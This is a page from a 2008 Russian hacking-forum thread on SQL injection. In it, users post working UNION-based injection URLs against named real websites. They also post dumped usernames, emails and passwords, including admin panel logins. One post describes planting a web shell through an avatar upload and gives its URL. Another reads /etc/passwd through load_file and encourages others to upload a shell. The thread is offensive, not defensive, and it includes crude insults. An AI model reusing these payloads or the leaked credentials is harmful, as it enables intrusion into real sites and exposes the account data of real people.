ANTICHAT.XYZ    VIDEO.ANTICHAT.XYZ    НОВЫЕ СООБЩЕНИЯ    ФОРУМ  
Баннер 1   Баннер 2
Antichat снова доступен.
Форум Antichat (Античат) возвращается и снова открыт для пользователей. Здесь обсуждаются безопасность, программирование, технологии и многое другое. Сообщество снова собирается вместе.
Новый адрес: forum.antichat.xyz
Вернуться   Форум АНТИЧАТ > Безопасность и Уязвимости > Уязвимости
Перезагрузить страницу SQL Инъекции
   
Ответ
Страница 601 из 1239 « Первая < 101501551591 597 598 599 600 601 602 603 604 605 6116517011101 > Последняя »
 
Опции темы Поиск в этой теме Опции просмотра

  #1  
Старый 28.07.2008, 05:23
Аватар для Cennarios
Cennarios
Участник форума
Регистрация: 13.07.2008
Сообщений: 101
Провел на форуме:
346497

Репутация: 303
Отправить сообщение для Cennarios с помощью ICQ
По умолчанию
http://www.sibgastroli.ru/?content=shownews&id=-1+union+select+1,2,3,4,concat(psw,0x3a,user),name, 7,8,9,10,11,12+from+forum_users+limit+0,10/*

login: alone_hunter
password: bear

Выборка по юзерам форума.

Зы: Таких программистов нужно е**ть в сраку =)(Отдавать неграм на растерзание)
Через upload аватара закачивается все что угодно душе =)

Наш выбор madshell.php =)

http://sibgastroli.ru/_images/users/alone_hunter.php


Можно покопаться в корне freebsd'шки агавовского хостинга =)
 
Ответить с цитированием

  #2  
Старый 28.07.2008, 05:25
Аватар для Cennarios
Cennarios
Участник форума
Регистрация: 13.07.2008
Сообщений: 101
Провел на форуме:
346497

Репутация: 303
Отправить сообщение для Cennarios с помощью ICQ
По умолчанию
Забыл: 842637 это пас админа, superadmin! это его же логин.

http://sibgastroli.ru/admin - соответственно админка.
 
Ответить с цитированием

  #3  
Старый 28.07.2008, 11:54
Аватар для MaSTeR GэN
MaSTeR GэN
Участник форума
Регистрация: 23.05.2008
Сообщений: 121
Провел на форуме:
305110

Репутация: 133
Отправить сообщение для MaSTeR GэN с помощью ICQ
По умолчанию
fat-cat.co.uk

Код:
http://fat-cat.co.uk/fatcat/artistInfo.php?id=-52+UNION+SELECT+1,concat_ws(0x1,id,username,password,email),3,4,5,6,7+FROM+users%20where%20id=2/*
Таблица users:
Код:
2iwantiwantiwantSeiji25xdl@tedra.net
3alex_teagundamalex_tea@r107.co.uk
......................................................................
......................................................................
1442chuppethxq92EAA932chuppeth@gmail.com
1443FemyanaehoowngIPouCm641lerik66@mymail-in.net
хеш текушева пользователя mysql.user и вывод file_priv
Код:
http://fat-cat.co.uk/fatcat/artistInfo.php?id=-52+UNION+SELECT+1,concat_ws(0x1,file_priv,user,password),3,4,5,6,7+from+mysql.user where user=left(user(),locate(0x40,user())-1)/
file_priv нет
Код:
Nfatcat*B4DE6388421C75A631A6BADDCC27DAEE58D0122A
sublackwell.co.uk
Код:
http://www.sublackwell.co.uk/gallery.php?id=2+and+substring(version(),1,1)=5--
Mysql 5 версии таблиц интересных не нашел (
 
Ответить с цитированием

  #4  
Старый 28.07.2008, 18:07
Аватар для nicusor
nicusor
Участник форума
Регистрация: 19.03.2008
Сообщений: 108
Провел на форуме:
1357043

Репутация: 137
По умолчанию
http://moldagrotehnica.md

user() = agro@localhost
version() = 4.1.14
database() = moldagrotehnica_md

http://moldagrotehnica.md/votShowRes.php?id_vot=-38/**/union/**/select/**/1,2,3,4/**/from/**/glt_voting_result/**/limit/**/1,1/*

http://moldagrotehnica.md/votShowRes.php?id_vot=-38/**/union/**/select/**/1,2,3,count(*)/**/from/**/glt_users/**/limit/**/0,1/*

count(*) from glt_users = 5

узнал названия и префикс таблиц когда отправил данные в vote.php
Query INSERT INTO `glt_voting_result` failed

админка на первой странице .. но не смог подобрать поля в базе
 
Ответить с цитированием

  #5  
Старый 28.07.2008, 19:55
Аватар для N1K70
N1K70
Banned
Регистрация: 02.01.2008
Сообщений: 195
Провел на форуме:
523549

Репутация: 301
Отправить сообщение для N1K70 с помощью ICQ
По умолчанию
Код:
http://www.pioneerhall.org/ugroups.php?UID=-1+UNION+SELECT+1,concat_ws(0x3a,version(),database(),user()),3,4,5,6,7,8,9,10,11,12,13,14,15--
user - pioneer_mainU@localhost
database - 5.0.51a-
version - pioneer_main
=\
 
Ответить с цитированием

  #6  
Старый 28.07.2008, 20:00
Аватар для MaSTeR GэN
MaSTeR GэN
Участник форума
Регистрация: 23.05.2008
Сообщений: 121
Провел на форуме:
305110

Репутация: 133
Отправить сообщение для MaSTeR GэN с помощью ICQ
По умолчанию
Prospect-magazine.co.uk
User: prospect@localhost
Version:4.1.20
Database: prospect_master

Код:
http://www.prospect-magazine.co.uk/list.php?category=131 UNION SELECT 1,2,3,4,5,6,7,8,9,10,concat_ws(0x1,Id,Email,Password),12,13 FROM Users where Id=90001/*&allIssues=1
содержание таблицы Users
Код:
1webadmin743@admin.comT91P73X
***************************
90001hugh@salinghall.comboutons
итого логин пасс к админке

user:webadmin743@admin.com
pass:T91P73X
Последний раз редактировалось MaSTeR GэN; 28.07.2008 в 20:03..
 
Ответить с цитированием

  #7  
Старый 29.07.2008, 06:30
Аватар для sabe
sabe
Постоянный
Регистрация: 16.03.2007
Сообщений: 380
Провел на форуме:
1404552

Репутация: 568
Отправить сообщение для sabe с помощью ICQ Отправить сообщение для sabe с помощью AIM Отправить сообщение для sabe с помощью Yahoo
По умолчанию
охх.. лето лето.. .DE ты? ))


Dfki.de - PR 7
Цитата:
http://www.dfki.de/lt/job_details.php?id=-1+union+select+1,2,3,concat_ws(0x3a,version(),user (),database()),5,6/*
Springer-sbm.de - PR 7
Цитата:
http://www.springer-sbm.de/index.php?id=291+union+select+unhex(hex(version()) )/*
Gfbv.de - PR 6
Цитата:
http://www.gfbv.de/report.php?id=-1+union+select+1,2,3,4,5,6,7,8,9,10,11,12,13,14,15 ,16,unhex(hex(version())),18,19,20,21,22,23,24,25, 26,27,28,29,30,31/*
Последний раз редактировалось sabe; 29.07.2008 в 06:55..
 
Ответить с цитированием

  #8  
Старый 29.07.2008, 13:54
Аватар для Cennarios
Cennarios
Участник форума
Регистрация: 13.07.2008
Сообщений: 101
Провел на форуме:
346497

Репутация: 303
Отправить сообщение для Cennarios с помощью ICQ
По умолчанию
http://www.vashstile.ru/profile.php?id=-1+union+select+1,2,3,4,concat(username,0x3a,passwo rd,0x3a,id),6,7,8,9,10+from+users+limit+63,70/*

Дешевый модератор бесполезного форума
login: Admin
pass: 12345678
Пленный сайт...
 
Ответить с цитированием

  #9  
Старый 29.07.2008, 16:13
Аватар для Snap
Snap
Познающий
Регистрация: 05.02.2007
Сообщений: 71
Провел на форуме:
423288

Репутация: 82
Отправить сообщение для Snap с помощью ICQ
По умолчанию
http://www.garem.ru/
Сайт проституток и знакомств если правильно понял.

http://www.garem.ru/act.php?id=-13+union+select+1,2,concat(table_name,char(58),col umn_name,char(58),table_schema),4,5,6,7,8,9,10,11, 12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28 ,29,30,31,32,33,34,35,36,37,38,39,40,41,42,43,44,4 5,46,47,48,49,50,51,52+from+information_schema.col umns+limit+0,1/*

Сорри времени на разбор небыло да и кому интересно будет там осталось ток таблици узнать.
 
Ответить с цитированием

  #10  
Старый 29.07.2008, 19:22
Аватар для sabe
sabe
Постоянный
Регистрация: 16.03.2007
Сообщений: 380
Провел на форуме:
1404552

Репутация: 568
Отправить сообщение для sabe с помощью ICQ Отправить сообщение для sabe с помощью AIM Отправить сообщение для sabe с помощью Yahoo
По умолчанию
Behindthename.com - PR 6
Цитата:
http://www.behindthename.com/bb/arcview.php?id=99999999999+union+select+1,2,3,4,5, 6,version(),8,9,10,11,12,13,14,15,16,17,18/*&board=gen
4 ветка..
Цитата:
http://www.behindthename.com/bb/arcview.php?id=99999999999+union+select+1,2,3,4,5, 6,concat_ws(0x3a,user,password),8,9,10,11,12,13,14 ,15,16,17,18+from+mysql.user/*&board=gen
рут..
Цитата:
http://www.behindthename.com/bb/arcview.php?id=99999999999+union+select+1,2,3,4,5, 6,load_file(0x2F6574632F706173737764),8,9,10,11,12 ,13,14,15,16,17,18/*&board=gen
пассы...
пробуйте залить шелл)

Arcoiris.tv - PR 5
Цитата:
http://www.arcoiris.tv/modules.php?id=-9268+union+select+1,2,3,4,5,6,7,8,version(),10,11, 12,13,14,15,16,17/*&name=Unique
Цитата:
http://www.arcoiris.tv/modules.php?id=-9268+union+select+1,2,3,4,5,6,7,8,unhex(hex(concat _ws(0x3a,username,password,0x766974616c))),10,11,1 2,13,14,15,16,17+from+users/*&name=Unique
подобрал таличку.. вывод в сорсе.)

Inst.ru - PR 5
Цитата:
http://www.inst.ru/catalog.php?id=-15+union+select+1,version(),3,4,5,6/*
Freenameastar.com - PR 3
Цитата:
http://www.freenameastar.com/viewstar.php?id=-231237+union+select+1,2,3,4,5,6,7,version(),9,10,1 1,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26/*
Jets.gaiva.ru
Цитата:
http://jets.gaiva.ru/index.php?id=read&name=effective&alt=3&E_ID=999999 +union+select+version()/*
Последний раз редактировалось sabe; 29.07.2008 в 20:22..
 
Ответить с цитированием
Ответ
Страница 601 из 1239 « Первая < 101501551591 597 598 599 600 601 602 603 604 605 6116517011101 > Последняя »



« Предыдущая тема | Следующая тема »
Похожие темы
Тема Автор Раздел Ответов Последнее сообщение
Обнаружение Sql инъекций в Oracle, часть вторая k00p3r Чужие Статьи 0 13.06.2005 11:26
SQL инъекция и Oracle, часть 2 k00p3r Чужие Статьи 0 13.06.2005 11:24
Sql инъекция и Oracle, часть первая k00p3r Чужие Статьи 0 13.06.2005 11:23
Внедрение Sql кода с завязанными глазами k00p3r Чужие Статьи 0 12.06.2005 20:48
SQL Injection в Oracle k00p3r Чужие Статьи 0 12.06.2005 12:41



Здесь присутствуют: 1 (пользователей: 0 , гостей: 1)
 


Быстрый переход




ANTICHAT.XYZ